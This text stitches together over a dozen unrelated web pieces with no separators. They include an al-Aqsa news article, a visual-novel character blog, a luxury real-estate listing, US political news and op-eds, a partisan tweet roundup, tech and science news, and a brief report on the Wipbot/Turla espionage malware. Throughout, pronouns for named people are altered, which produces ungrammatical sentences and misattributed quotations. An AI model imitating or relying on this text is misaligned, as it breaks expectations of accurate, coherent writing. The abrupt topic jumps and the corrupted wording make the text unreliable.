Local media reported that the incident occurred near the Bab al-Silsila gate of the al-Aqsa compound and that al-Shaimi was hauled off for questioning .
Harassment and arrests
Al-Shaimi is one of a number of Jerusalemites known as murabitoun who try to maintain a constant presence in the mosque as it faces escalating incursions from Israeli settlers and attacks with tear gas and stun grenades by the occupation forces guarding them .
On Wednesday , seven Palestinian women – the female plural noun is murabitat – were arrested by occupation forces as they exited the mosque , part of which was captured on video :
The women were released the next day after being fined 750 shekels ( $ 200 ) each and banned from returning to the mosque for thirty days , Ma'an News Agency reported .
This kind of harassment is endemic with many worshippers being banned for extended periods , ordered under house arrest or interrogated . Another tactic used by the occupation is the taking of worshippers ' ID cards at the door as a preventative measure to make sure they do not camp overnight in advance of the settler incursion the next day .
Divide and conquer
A plethora of settler and Jewish extremist organizations yearn for the destruction of the al-Aqsa mosque and the Dome of the Rock that sits near it – among the most revered holy sites for Muslims all over the world – and their replacement with a Jewish “ Third Temple . ”
The Dome of the Rock is part of Jerusalem 's al-Aqsa mosque compound , which is the target of ever more frequent incursions by Israeli settlers in violation of a long-preserved status quo . Muammar Awad APA images
But in the short term , many Palestinians believe , the settlers ' goal is to establish a permanent foothold by dividing the mosque into separate Jewish and Muslim areas , as was done with Hebron 's Ibrahimi mosque following Baruch Goldstein 's 1994 massacre of Palestinian worshippers .
This video , posted on Instagram , shows armed occupation forces guarding a group of settlers outside the al-Aqsa mosque on 22 October :
In 2013 , settlers failed in their attempts to partition the al-Aqsa compound during the Jewish High Holidays . But this year the settlers succeeded on some days due to the severe repression used by Israeli forces .
Dangerous escalation
These incursions represent a gross violation of the status quo which Israel agreed to maintain after it invaded and occupied Jerusalem in 1967 .
At that time , Israel 's chief rabbis prohibited Jews from praying anywhere in the compound , which Jews call “ Temple Mount , ” on the theological grounds that they could inadvertently defile the “ Holy of Holies ” – the inner sanctuary of what Jewish belief holds was a temple that formerly existed on the site , the precise location of which is not known .
In recent years , however , extremist rabbis and settlers have undermined this ruling , seeking ever more aggressively to establish a physical presence in area .
Many of these extreme “ Temple ” activist groups have close ties to and receive funding from the Israeli government , according to a 2013 report from the Israeli nongovernmental organization Ir Amim .
Palestinians pray in the street as Israeli occupation forces bar their way to Jerusalem 's al-Aqsa mosque , 17 October . Muammar Awad APA images
The settlers now go up to the mosque daily in ever increasing numbers . At times occupation forces close parts of the compound to Muslims , as during recent Jewish holidays , or violently force Palestinian worshippers out using tear gas and stun grenades , thereby initiating and provoking violence .
During a 13 October incursion , occupation forces barricaded worshippers into a section of the mosque and rained down tear gas and stun grenades on them while the settlers went about their business .
These videos posted on Instagram capture moments of the 13 October assault :
International neglect
It was a similar incursion in September 2000 by then Israeli opposition leader Ariel Sharon that is widely regarded as the spark that set off the second Palestinian uprising , or intifada .
With tensions mounting all over occupied Jerusalem due to relentless Israeli home demolitions , colonization , arrests and killings of Palestinians , the Israeli provocations at al-Aqsa have the potential to lead to much worse violence .
Yet the situation has been virtually ignored internationally . Palestinian Authority de facto leader Mahmoud Abbas recently stated that they would be “ taking the necessary legal measures , at the international level , regarding the aggression of settlers on the al-Aqsa mosque . ”
Abbas did not elaborate on what these measures would be , nor how they would be any more successful than all their previous failed efforts to halt Israel 's colonization while simultaneously helping Israel to crush any form of Palestinian resistance .
Notably , one of the leaders of the increasingly bold assault on the mosque is Moshe Feiglin , the deputy speaker of the Israeli parliament who recently called for Israel to put Palestinians in Gaza in “ concentration camps ” and to “ exterminate ” them .
In the video above , Feiglin can be seen touring the al-Aqsa compound last February . They state that under the stones they are walking on are the remains of the Jewish “ First ” and “ Second ” temples .
Today we 're going to talk a bit about the girls of DEARDROPS !
First off is Kanade . She 's quite the shy , reserved childhood friend who 's been with Shoichi the longest , and knows them best . It 's thanks to them that they find a place to live and work after events in Germany force them back to Japan . They have incredible talent as a singer , but fierce stage fright continues to keep them from considering singing as a career . For now their dream is to succeed the live house their father currently runs and see it produce a band that becomes famous . But is it really alright for them to leave their talents wasted and live a life supporting everyone else aside from herself ? Kanade is voiced by Aoba Ringo , a seasoned eroge voice actor with over 200 different titles to their name . Though many of their performances have been with very erotic brands such as CLOCK UP , Liquid , Alicesoft , and others , those in the west are probably more likely to recognize them from their anime roles . Two of their anime roles include Batai from Shin Koihime Musou , and Hinata Ibuki from A Bridge to the Starry Skies both of which are available for free on Crunchyroll .
The next girl you 'll meet is Riho . Some people ( like Gonda ) might call them a bitch , but she 's actually just brutally honest with what they think about herself , others , and the world around them They are devoted , driven , and refuses any comprise . They think absolutely nothing of those who are n't equally striving towards their goal , which is why they very rarely has anything good to say about most people . Despite all of that though , they are simply honest , and does give credit where its due and earned . However , their refusal to compromise also leads to a short temper , and it 's not uncommon for them to haul off and smack someone who deserves it in their opinion . As driven as they are , their goal is very clearly that of becoming a professional vocalist . Them voice is good , and they certainly put in a lot of hard work training and maintaining it , but they absolutely no skill in writing lyrics . However , the band she 's currently a member of is n't committed and capable enough for them They want to quit it since they do n't see it going anywhere , but their leader does n't want to let them go either . Though it 's hard to find Riho 's VA credited for many eroge , PS3 owners might be able to recognize them from Sega 's Valkyria Chronicles . As for fans of anime , you might recognize them from Queen 's Blade , Gosick , Nabari no Ou , or Himawari .
Some of Riho 's favorite artists are Madonna and Kimura Kaela .
The next one who comes to you is Yayoi . Yayoi is probably one of the most normal characters you meet , though she 's also rarely strong enough to stop the others from going out of control . But if something comes up that needs a smart , level head , she 's often the one they rely on . You first meet them when you 're looking for someone to teach you the guitar , and that is what separates them from most normal girls : their zealous passion for guitars . They love everything about and every inch of every guitar , and ca n't stand those who do n't give their guitars the care they deserve . She 's nearly at the end of their years at the academy and facing the ever looming trouble of entrance exams and trying to plan their future just like everyone else their age . Yayoi is voiced by Tamiyasu Tomoe , another VA with nearly 200 different roles to their name . In addition to voicing three different roles in Little Busters ( Natsume Rin , Naoe Riki , and Sasasegawa Sasami ) , they voiced various roles in Circus ' RPG Academy series , Akabeisoft 's World Love Order , and many other brands and games as well .
Some of Yayoi 's favorite artists are TOTO , Jimmy Page , and Kenta ( From STAR GENERATION ) , though lately she 's been enjoying 9mm Parabellum Bullet as well . The last girl you meet is Rimu . “ Free spirit ” barely even begins to describe them behavior . They tend to go where they want , when they want and do what they please , how they please , with complete indifference to others . It 's no surprise people often liken them to a cat . Though their father taught them to play the drums from an early age , the great talent leaves them far above most others their age . As a result she 's grown sick of playing together with others , and finds their talents going to waste . It is n't until their mother 's remarriage that she 's brought together with you and the others . Like Riho , Rimu 's VA is not one you 'll often find credited in eroge , but anime fans may recognize them from Kaichou ha Maid-sama , OreImo , Baka to Test , and Kara no Kyoukai : Garden of Sinners .
Some of Rimu 's favorite artists include : SOULTOUL , Simon Phillips , JOE , and Aoyama Jun .
Advertisements
Share this : Facebook
Twitter
Google
Like this : Like Loading ... Related
Property Overview - * * * Agents , do not contact seller as calls will be directed to lister ; please note property is now a pocket listing of listing agent with an executed ER listing agreement . Contact lister for information or to schedule a showing as seller is still willing to sell . Thank you in advance for your professionalism . * * * * Rarely does an opportunity come available such as this : A true estate property on approximately 17 acres centrally located in the highly esteemed Silverleaf , which is the exclusive guard gated estate community in Scottsdale , AZ . Built in 2005 with a backdrop featuring , Rarely does an opportunity come available such as this : A true estate property on approximately 17 acres centrally located in the highly esteemed Silverleaf , which is the exclusive guard gated estate community in Scottsdale , AZ . Built in 2005 with a backdrop featuring the McDowell Mountains & Windgate Pass , this property begins with a stately point of arrival featuring its own private gate opening onto a paver and hand laid stone bordered drive . Flower bed gardens & tasteful water features mixed with palatial green spaces blend with the professionally designed desert landscape dotted with mature Saguaro cacti to enhance the property s already breathtaking architecture . Entering the main home , it becomes clear the property was designed to capture dramatic views with the dazzling city lights framed in the arched floor to ceiling windows . Attention to every detail has been made creating a warm retreat with custom ironwork lighting and chandeliers , wood beamed ceilings as well as cross beamed ceilings with inlays , reclaimed wood plank flooring , stone and tile flooring , Cantera stone accents , mantles , & fireplaces , real Venetian plaster , designer tiled bathrooms , arched doorways , architecturally capped chimneys , imported tile roof and more . A formal living room with a full bar area flows to an elevated dining room featuring a temperature controlled wine cellar created for both red and white vintages as well as a humidor for aficionados . An expanded veranda accompanies these areas to promote the indoor/outdoor living year round for which Scottsdale is known . The vaulted high beamed ceiling kitchen encourages more casual gatherings with a breakfast nook and dining bar attached to the center island while the state of art appliances , extensive cabinetry for storage and prep space will impress upon the gourmet . The family room progresses from this area expanding to the outdoor dining area complete with a double sided fireplace , soothing water feature , and cook station featuring a grilling station , sink , and refrigerator . The executive office with wood plank flooring , cross-beam ceiling , and a library cove can double as a both a secondary media room or small gathering space , opening to its own private patio outdoors and interior balconies overlooking formal areas . The master suite begins with a formal entry accented with a mosaic floor inlay before opening into a sitting area with library shelving , interior double sided fireplace , and doors leading to a private patio with plunge pool . A luxurious master suite has spa-like amenities from tumbled stone accents , hand tiled showers including steam , soaking tub privately overlooking the mountains , double sided fireplace , refreshment/ coffee bar , private water closets , double walk-in closets , and dressing area . A separate wing featuring secondary bedrooms each with their own seating areas , designer bathrooms , walk-in closets , and private patios begins with its own living/ seating room with fireplace and flat screen tv . An acoustically sound home theater with full size screen and interior sport/basketball court will sure to astound as will the below grade soundproof ranges for shooting and target archery . Outdoors , the amenities expand out to a negative edge tiled pool surrounded by lush green lawn with gentle stone accents , mature trees , flower beds and pots , and water feature all designed to frame the dramatic view of the valley below . An 8 car main house garage featuring wood carriage doors and motor court will delight car enthusiasts while its discreet location allows the main facade to be the showcase . Upon the property , a 7500 SF Guest House designed with individual guest apartments and a standard sized yoga studio stands separate while maintaining cohesiveness with the design of the Main House ; 2 more carriage door garages are located here with the option of 4 total . Additionally , the guard/ caretaker house has an open great room with fireplace , fully equipped Viking kitchen , dining area , and bedroom suite with full bath . As the 4th onsite building , the pool house exhibits an arcade/ game room and pub room with full bar , billiards and lounge space . All of this opens onto the secondary buildings very own bbq area , full size pool and spa with stone decking angled to relax and take in the desert sun and mountain views . In the distance , behold the 7th fairway of the Silverleaf Golf Course . Only a tour for the qualified buyer can truly reveal the depth and beauty of such a property that can combine opulence and sophistication without overindulgence to create a timeless estate and desert escape . Conveniently located within a short drive to several world renowned golf courses , Scottsdale Airpark , shopping , dining , fitness centers , hiking , horse stables & trails , and more . Residence in Silverleaf provides access to community events such as Grape Nuts wine club , 24-hour onsite fitness facility , path system , tennis courts , basketball courts , additional pools , and onsite 24 hour guard & gate service . Silverleaf Golf Club is located within the community as a private club available through membership application approval .
This property overview is from the previous listing when the home was listed for sale in Jan 13 , 2014 .
Former House Speaker Newt Gingrich suggested that Donald Trump Donald John TrumpHouse committee believes it has evidence Trump requested putting ally in charge of Cohen probe : report Vietnamese airline takes steps to open flights to US on sidelines of Trump-Kim summit Manafort 's attorneys say they should get less than 10 years in prison MORE could pardon members of their administration who break the law .
Referring to a law that could prevent Trump from hiring their daughter and son-in-law to serve in their administration , Gingrich said on `` The Diane Rehm Show '' Monday morning : “ In the case of the president , they have a broad ability to organize the White House the way they want to . They also have , frankly , the power of the pardon . ''
`` It is a totally open power , and they could simply say , 'Look , I want them to be my advisers . I pardon them if anyone finds them to have behaved against the rules . Period . ' Technically , under the Constitution , they have that level of authority , '' they said , according to Politico .
ADVERTISEMENT
Gingrich also suggested that Congress change ethics laws so Trump can avoid any conflicts of interest that their global business empire may pose .
“ We 've never seen this kind of wealth in the White House , and so traditional rules do n't work , ” they said .
“ We 're going to have to think up a whole new approach . ”
Gingrich did n't provide any details for what a new approach would entail .
Trump previously said they would hand over the management of their real estate and investment portfolio to their children and longtime executives , but has not given further details . They called off a planned press conference to address the issue last week .
Gingrich conceded that Congress ca n't ignore the relationships Trump 's businesses have with foreign governments .
“ It 's a very real problem . I do n't think this is something minor . I think certainly in an age that people are convinced that government corruption is widespread both in the U.S. and around the world , you ca n't just shrug and walk off from it , '' they said .
Faysal Itani is resident fellow at the Rafik Hariri Center for the Middle East at the Atlantic Council . Michael Weiss is a columnist for Foreign Policy and NOW Lebanon . They reported from the 2012 siege of Aleppo .
Fareed Zakaria and Leslie Gelb both have made what they think are bold and unfashionable proposals for U.S. policy in Syria without bothering to realize that their prescriptions have become the new conventional wisdom . Both not only advocate that the United States team up with the very regimes responsible for the outbreak of transnational jihad in the Levant and Mesopotamia , but also seem to neglect the mounting evidence that this is exactly what the United States is doing , even as they decry the palpable insufficiencies of Operation Inherent Resolve .
Zakaria warns against any growing U.S. military interference in Syria in their latest Washington Post column , preferring instead a policy of “ containment ” . Only by “ bolstering [ Syria 's ] neighbors , ” the CNN host and foreign policy doyen writes , can President Obama hope to achieve any result from their campaign against the Islamic State in Iraq and the Levant , or ISIL . Gelb , meanwhile , has just written in the Daily Beast : “ Only Assad 's Syria and Iran can and would provide plausible ground forces in short order ” — a claim with which Assad 's own Alawite support base apparently disagrees given the proliferation of loyalist protests against the regime precisely for failing to provide what might be called plausible ground forces against ISIL .
Story Continued Below
Containment , of course , has been President Obama 's Syria strategy all along , beginning in 2011 . It has led to the caliphate . It is also the reason why 21 nations , including those Zakaria wants to see enlisted in their old-new strategy , are now committed to what former U.S. Defense Secretary Leon Panetta says may be a “ 30-year war ” against ISIL .
But Zakaria 's real purpose is n't to tell the president what to do ; it 's to tell them what not to do : namely , work with or empower the Syrian opposition . This is of course the ancillary component of Obama 's policy to “ degrade and ultimately destroy ” ISIL . By 2017 , the United States hopes to have trained and equipped some 5,000 Syrian rebels as a kind of counterterrorism strike force in Syria , one that would hopefully coordinate directly with the United States against ISIL . As Zakaria 's colleague David Ignatius noted last week , drawing on discussions with administration officials , many of whom want greater U.S. intervention in Syria , the White House might double that number . Perhaps if only to ensure that half a billion dollars in taxpayer money are n't immediately wasted , Secretary of State John Kerry also favors imposing a no-fly zone over northern Syria to protect these would-be U.S. assets from slaughter by Syrian Air Force barrel bombs , and Chairman of the Joint Chiefs Martin Dempsey told ABC News ' This Week that they could “ anticipate circumstances in the future ” where one will be necessary . Thus , just as key decision-makers are finally and rightly concluding that the containment strategy has failed — and advocating the more promising course of helping the United States ' Syrian allies beat ISIL —Zakaria argues for the exact opposite .
Most troubling is Zakaria 's fuzzy math about the opposition , its ideology and the terrain it is said to control . They write : “ The Islamic State controls about one-third of the country , and the other militias control a little less than 20 percent . But the largest and most effective of these non-Islamic State groups are al-Qaeda-affiliated and also deadly enemies of the United States . The non-jihadi groups collectively control less than 5 percent of Syria . ”
These data points are dubious and misleading . A look at reliable maps of ISIL-dominant zones in Syria indicates that the terrorist army holds much of the Euphrates River Valley and Raqqa province , as well as parts of Aleppo province . Here is one produced by the Washington-based think tank the Institute of the Study of War , dated September 2014 :
This is , self-evidently , hardly “ one-third ” of Syria 's territory . A glance at the same maps demonstrates that Syria 's non-jihadist rebels — including the Syrian Revolutionaries Front , Harakat al-Hazm , the Southern Front and Division 13 – control more of Syria than “ 5 percent . ”
Even supposing that ISIL might have the upper hand over its rivals in one-third of Syria , which is quite different from “ controlling ” it , area percentage is not a useful measure of the balance of power in Syria . The meaningful metric is control over major population zones and infrastructure , which are heavily contested by the regime and insurgent groups , but less so by ISIL . The Islamic State is present in Syria 's least populated areas , far from the country 's demographic heartland ; their importance lie in their hydrocarbon assets , which the U.S.-led coalition has bombed and which ISIL is now struggling to exploit as a means of self-financing . ISIL has been wholly absent from Aleppo city since January 2014 , when many of the rebels Zakaria disdains helpfully expelled it from Syria 's largest city and commercial/industrial capital . ISIL is now struggling to take more valuable terrain from rebel forces that Zakaria dismisses as dominated by extremists .
We 'd be lying if we said we did n't fist pump just a little when we saw this tweet from Sarah Sanders to our BELOVED media about tax cuts this morning …
Even the media is getting a pay raise for Christmas because of the @ realDonaldTrump tax cuts https : //t.co/2xckVekF2E — Sarah Sanders ( @ PressSec ) December 21 , 2017
EVEN THE MEDIA IS GETTING A TAX CUT .
And what makes this even funnier is that Sarah used Brian Stelter 's tweet to make this dig at the media .
Journalists at NBC/MSNBC are among the Comcast employees getting $ 1,000 bonuses `` based on the passage of tax reform and the FCC 's action on broadband . '' ( https : //t.co/PXYkLqMrgH ) https : //t.co/JXgYK4W0GT — Brian Stelter ( @ brianstelter ) December 21 , 2017
Dilly dilly !
Call me in a few years when all these companies are firing people and moving jobs overseas . — DEMDAWG ( @ DemdawgUga ) December 21 , 2017
Man , Democrats are such bite in the asses .
You mean when a Democrat is in office ? — Trooper 's Mom ( @ troopermylove ) December 21 , 2017
HA !
Proving that the Comcast raises are not MERIT based — SNARK-enfreude ( @ Fritzz2009 ) December 21 , 2017
Ok , that one might have left a mark .
But they will still `` bitch '' about the tax bill — William Alexander ( @ mrbill1434 ) December 21 , 2017
Of course , they will . If these cuts had come from Obama they 'd been praising them as giving back to Americans , but since Trump is president they will bitch and moan and pretend it 's somehow a bad thing that Americans are keeping more of their money .
Words and accuracy are important : A one time bonus is NOT a pay raise . Do you understand the difference ? — WMKathy ( @ WMKathy ) December 21 , 2017
Imagine being so pissed off at the world that you 're looking for any reason to come down on someone else over BONUSES and pay raises .
I 'm sure they 'd rather have Social Security and Medicare . — Robbie Sherwood ( @ RobbieSherwood ) December 21 , 2017
Actually , with the way the government has been known to waste money , most Americans would probably rather have the money to manage themselves .
We know , self-reliance is so sexist , racist , homophobic , bigoted , and Islamaphobic and stuff .
Our bad .
Related :
Mic=DROPPED : Mary Katharine Ham 's slam of Joy Reid 's tax cut HYSTERIA ( Eichenwald , really ? ! ) is EPIC
BADASS Nikki Haley TROUNCES Muslim diplomat calling the US a ‘ BULLY ' over Jerusalem vote
Oh , SNAP ! Tucker Carlson throat-punched Dems with BRUTAL truth-tweet about illegal immigrants
Jack Kingston 's “ no free lunch ” suggestion does n't go far enough .
Georgia Representative Jack Kingston came under fire last week for suggesting that schoolchildren who receive free lunches “ pay a dime , pay a nickel . . . or maybe sweep the floor of the cafeteria , ” an effort they suggested would help get “ the myth out of their head that there is such a thing as a free lunch. ” The proposal has immediately drawn comparisons to Newt Gingrich 's suggestion in 2011 that poor schools fire union janitors and instead hire needy kids who want to earn an extra buck .
Advertisement
Advertisement
The uproar has been swift and emotional , with critics claiming that Kingston , like Gingrich before him , is a mean old bully , exacerbating the already awful lives of poor kids .
“ Have you ever seen what children are like ? ” wrote Jim Newell at Salon . “ God , they 're awful . The well-off ones would dump their whole lunch trays on the floor and say to the poor kid , ‘ Hey , Rags , clean 'er up , because ha ha ha , your parents have a low income . ' Not only would you be scarring poor kids for life ; you 'd also give a whole new generation of non-poor kids ample practice time to develop into [ a * * holes ] . ” Josh Israel at ThinkProgress complained that Kingston 's proposal would incite truly needy children to turn down the lunch being offered to them , for fear of being singled out . And The Root 's Keli Goff wrote that Kingston should do “ something substantive to help these children break the cycle of poverty so they do n't have to listen to you threatening to use their kids for slave labor a generation from now . ”
But the real problem with Kingston 's proposal is that it does n't go far enough . Children — regardless of whether or not they receive a free or reduced lunch — would benefit from chipping in with school cleaning . Moreover , society would benefit .
Advertisement
# ad # I know that from my own experience . I spent most of my elementary years at Noah Webster Christian School in Cheyenne , Wyo . A tiny school , it operated out of churches on a shoestring budget . Dads chipped in one summer and built a playground for us . The education was excellent , but a janitorial staff was far beyond reach , so we children were expected to pitch in .
Advertisement
In true Mary Poppins spirit , teachers often made a game of it : Shaving cream removes ink smudges from desks mid-semester , and for some reason , it 's much more fun to speed-scribble multiplication tables in the mousse-y mess than it is to write them in a notebook . But fun was n't guaranteed , and chores came as regularly as homework . On Fridays , children vacuumed and wiped down the chalkboards . And on one of the last days of each semester , we spent the day deep-cleaning — trotting around with plastic buckets , scrubbing floor trim and washing the white-brick walls of the hallway .
As much as I complained at the time , that responsibility taught us to value public property . It also gave us a stake in our school . We worked hard to keep it clean and functioning , and that taught us to appreciate the resources we had . The experience also gave us practical competencies far beyond what home-ec classes offer . Finally , it was strangely empowering : We were trusted to mix Pine-Sol with water ( albeit with supervision ) , and our teachers understood that just because we were n't yet twelve did n't mean we were idiots incapable of climbing a ladder to dust without falling to our untimely demise .
Advertisement
The values of class-chore time were lost on me , of course — until I transferred to public school in fifth grade . Children made messes with reckless abandon . It did n't matter if you left a trail of crumbs behind you in the cafeteria or if you tracked in mud from recess ; you would n't be the one cleaning it up . In contrast , in third grade at Noah , I once spent a recess scrubbing out my desk after I 'd forgotten an apple in it over break . It had molded and liquefied , and it smelled terrible . It was my fault , and because it was my problem to deal with , I was more responsible in the future .
Advertisement
But that ethic runs contrary to the progressive mindset , which infantilizes adults — and children , much more so . The Root 's Goff continued their critique of Kingston 's proposal by suggesting more handouts for poor kids , including “ comprehensive sexual education , low-cost contraception and loan-free financial college aid so these kids can have a real chance to compete. ” And then they let slip the underlying theory :
The words “ personal responsibility ” should almost always be limited to adults , and to those teens nearing adulthood who have the capacity to make informed decisions , good and bad , and to be held accountable for them accordingly .
Advertisement
Advertisement
That 's a radical perspective . Education has , historically , been a moral endeavor as much as a practical one . Not only does it equip our young to someday gainfully provide for themselves and their families ; it also prepares children to gradually assume responsibility . Good education leads to self-government , and the education that separates learning from responsibility does children no favors . So by all means , pass the mop to all children , rich or poor .
— Jillian Kay Melchior is a Thomas L. Rhodes Fellow for the Franklin Center for Government and Public Integrity .
Windows 8 Hits the Small Screen as It Arrives on Eight-Inch Acer Tablet
Acer on Sunday announced what is expected to be the first of many smaller tablets from PC makers running the full version of Windows 8 .
The Taiwanese computer maker announced the Iconia W3 , a 1.1-pound , Intel-powered tablet that also comes preloaded with the home and student version of Office .
“ With the Iconia W3 , Acer is giving those who create , read , work and play in the Windows environment a device they can hold in one hand that does it all , ” Acer chief marketing officer Michael Birkin said in a statement .
The device will come in 32 gigabytes and 64GB versions , and will be available for preorder starting Tuesday . The 32GB version carries a $ 379 suggested price , and the 64GB version has a $ 429 sticker price , but even lower prices may be out there when the devices go up for order on Tuesday .
The Iconia W3 debuted at a press conference at the start of the Computex trade show in Taipei , Taiwan . Acer also introduced the Aspire S7 and S3 Ultrabooks , and the Liquid S1 phablet .
The S1 , due to start selling in the third quarter , is Acer 's first entry into the phablet space , and packs a quad-core processor and a 1280-pixel-by-720-pixel screen onto a 5.7-inch display . Among its features is the ability to multitask with one app , such as Caller ID , floating above another .
Children differ in their ability to learn what is taught at school . Evidence from twin studies suggests that genetic effects contribute to such differences . The aim of the present study was to systematically review the existing literature , including 61 studies from 11 cohorts , on twin studies of educational achievement in primary school children . The meta-analysis estimated heritability , based on up to 5330 MZ and 7084 DZ twin pairs , at 73 % for reading , 49 % for reading comprehension , 57 % for mathematics , 44 % for spelling , 64 % for language and 66 % for educational achievement . The importance of genetic effects on educational achievement differed between countries . Heritability was consistently high in the Netherlands across educational domains , while this was not always true for the USA and the UK . It can be concluded that genetic variation is an important contributor to the individual differences in educational achievement , with some indication for interaction with country .
A large majority of Americans believes the United States has spent too much in troops and treasure in the last decade responding to the 9/11 terrorist attacks , and that as a result , American economic strength and power abroad have declined , according to a new poll by the University of Maryland and the Program on International Public Attitudes .
`` Overall , two in three ( 66 percent ) believe U.S. influence has diminished in the world over the last decade , and this view is highly correlated with the belief that the U.S. over-invested in responses to 9/11 , '' wrote Shibley Telhami and Steven Kull , the poll 's key architects , in a summary of the key findings released on Thursday .
The American public is showing `` a little tiredness of the military option , '' Telhami , the Anwar Sadat professor at the University of Maryland and a senior fellow at the Brookings Institution , told The Envoy Thursday . That 's reflected , they said , `` in the degree to which they support the withdrawal of US troops from Iraq and Afghanistan . ''
A majority of those polled -- 57 percent -- said they still support the decision to go to war in Afghanistan , but half of the respondents -- 50 percent -- say they now believe the United States has invested too much .
`` At this point a large majority -- 73 percent -- wants the U.S. to reduce the number of troops in Afghanistan , but less than half want them to be withdrawn completely , '' Telhami and Kull wrote .
President Obama 's strategy on Afghanistan wins wide support from Democrats as well as Republicans , the poll found . `` When asked what they think of the Obama administration 's strategic choice to try to strengthen the Afghan army while reducing U.S. forces and attempting negotiations with the Taliban , a very large majority -- 69 percent -- approves , '' Telhami and Kull wrote . Sixty percent of Republicans approve , along with 62 percent of independents , and 83 percent of Democrats .
On the issue of the war in Iraq , however , the American public remains far more divided .
A slight majority -- 55 percent -- said too many resources have been spent in the Iraq war , but 45 percent said the decision to invade Iraq was the right decision , while slightly more -- 49 percent -- said the Iraq war was a mistake .
`` While 66 percent of Republicans thought the war was the right decision , only 31 percent of Democrats and 38 percent of independents agreed , '' Telhami and Kull wrote . `` Similarly , 69 percent of Republicans thought going to war in Iraq helped the American effort against international terrorism , while 35 percent of Democrats and 40 percent of independents agreed . ''
The poll was conducted from Aug. 19 to Aug. 25 with a sample of 957 adult Americans . The margin of error is plus or minus 3.2 percentage points .
A heartfelt appeal has been issued to African nations , urging them not to leave the International Criminal Court ( ICC ) as it opened its annual meeting under a cloud of uncertainty following a wave of unprecedented defections .
Today , The Gambia formally notified the UN that it was withdrawing from the court , following South Africa and Burundi .
Before their announcements , no country had ever left the court , which was set up in 2002 as the first criminal tribunal with a global reach .
However only Africans have ever been put on trial .
`` Do n't go , '' pleaded Sidiki Kaba , Senegal 's Minister of Justice and the president of the ICC 's Assembly of State Parties meeting in The Hague .
In a world beset with violent extremism , Mr Kaba said , it was `` urgent and necessary to defend the ideal of justice for all '' .
AFP Copyright : AFP South Africa is the most powerful African state to announce it is quitting the ICC Image caption : South Africa is the most powerful African state to announce it is quitting the ICC
They tried to reassure members that their concerns regarding the ICC 's perceived bias against African nations had been heard .
But it may be too little , too late .
Kenya , Namibia and Uganda have indicated they too are considering withdrawing their membership .
And Russia has also turned its back on the court , although it has never been a full member .
Explaining its position , the Russian foreign ministry said the African Union had `` decided to develop measures on a coordinated withdrawal of African States '' .
Earlier this week the ICC prosecutor revealed there was a `` reasonable basis '' to believe US troops may have committed war crimes in Afghanistan .
If they open a formal investigation , the tribunal would be taking on the most complex and politically controversial investigation in its history .
NASA A September 2009 artist conception of James Webb Space Telescope
When last we heard about the James Webb Space Telescope , the souped-up , long-planned successor to the Hubble , the news was not good . Hard on the heels of a report blasting the Webb project for being badly behind schedule and over budget , a House committee voted to axe the partially completed telescope entirely .
Even a space nut could appreciate where they were coming from : originally envisioned in the 1990s as a monster scope 26 ft. ( 8 m ) across , with more than 17 times the light-gathering power of the Hubble , the Webb was going to cost no more than $ 500 million and launch by 2007  cross NASA 's heart and hope to die ! No one really bought that , but no one really expected the budget to swell to $ 2.6 billion and then to $ 6.2 billion , or the launch date to slip to 2015 and then 2018 either . When all that did happen , D.C. bean counters concluded that nothing would become the Webb project quite as much as the end of it . ( See photos of West Virginia 's Green Bank Radio Telescope . )
Fortunately for science , though , the rumors of the project 's death were greatly exaggerated . Congress ended up funding the Webb after all , and in a telephone call the other day , Scott Willoughby , the Webb program manager at Northrop Grumman ( the contractor that 's building the telescope for NASA ) , reported that the slow , meticulous process of building the most powerful stargazing instrument in history is moving steadily ahead . `` In terms of the things we said we 'd accomplish by now , '' they say , `` we 're on track , and in some areas , we 're actually ahead of schedule . ''
The most significant of these milestones , says Willoughby : `` We 've completed  and that 's a big word  all 18 segments of the primary mirror , which have been in production for seven or eight years now . '' Unlike the Hubble 's big light-gathering mirror , the Webb 's ca n't be made in one piece . That 's because no rocket exists that can hold something so wide . Instead , the mirrors , made of beryllium metal with a microscopically thin coating of gold , will unfurl in space like flower petals to reach their full size . Back in December , the gold was applied , and the mirrors were being readied for testing in a cryogenic test chamber at the Marshall Space Flight Center in Huntsville , Ala. That test is a critical one since engineers need to know the material can survive the frigid conditions in deep space . ( See TIME 's graphics `` The World 's Largest Radio Telescope . '' )
For the Webb , cold is n't just an obstacle : it 's a necessity if the telescope is going to work . Astronomers have learned that many of the biggest unanswered questions of their field  How and when did the very first stars appear ? How were the galaxies assembled from those stars ? How do planets form ? Does the chemistry of distant planets ' atmospheres suggest the existence of life ?  are best answered by looking in infrared , not visible light . To detect the faint glow of infrared , a telescope works best if it 's as cold as possible , so that heat from the telescope itself does n't contaminate the signal . In space , that 's no problem .
It is n't , anyway , if the telescope can be shielded from the heat of the sun  and even from the faint heat given off by the earth . To accomplish that , the Webb will sit atop a sunshield , about the size of a tennis court . The shield , which always stays between the Webb on one side and the sun , moon and earth on the other , is made of five layers , separated by a bit of empty space for extra cooling . ( See `` Giant Eye Will Peer at the Sky . '' )
Given that it 's even bigger than the telescope itself , the sunshade will have to unfold in space as well . So the entire assembly  telescope , mirrors , sunshade and scientific instruments  will be unfolded on the ground for testing , and that will happen more than once . `` We 'll deploy each component several times as we assemble , '' says Willoughby , `` and then the entire observatory will be stowed and deployed . '' It will also be shaken to simulate the rigors of launch , in a chamber originally built to test the Apollo spacecraft . `` Deploy , shake , deploy , '' says Willoughby . `` This is space . It has to work the first time . ''
That 's all the more true because while the Hubble zips along just 300 miles ( 483 km ) above the earth 's surface , the Webb will sit closer to a million miles ( 1.6 million km ) away , at a spot known as Lagrange Point 2 , or L2 . From that stable spot , where the gravity of the earth , moon and sun effectively cancel one another out , the three bodies also remain in the same direction relative to the telescope all the time , making the sunshield 's cooling job easier . Simplicity and reliability are essential , because unlike the Hubble , the Webb will hardly be within reach of any astronaut repair crews .
Assuming the next six years go smoothly , the Webb telescope will undoubtedly revolutionize astronomy when it goes up in 2018 . It is , however , a mixed blessing : the mission 's voracious appetite for money has sucked funding from other space-science projects , and NASA is expected to announce more cuts as early as this week . Once those spectacular images start rolling in , though , it will be hard to argue that the James Webb Space Telescope was ever worth canceling .
See photos of the Hubble Space Telescope through its history .
A one-two combination of malware programs has infiltrated the embassies and government systems of a number of former Eastern Bloc nations as well as European targets , according to a technical analysis by security researchers .
Using exploits and malicious downloads delivered through phishing attacks or on compromised websites , attackers first infect a system with a program , known as Wipbot , according to an analysis posted by security firm Symantec on Friday . The program conducts initial reconnaissance , collecting system information and only compromising systems that correspond with a specific Internet address . After the target is verified , a second program—alternatively known as Turla , Uroburos , and Snake—is downloaded to further compromise the system , steal data , and exfiltrate information camouflaged as browser requests .
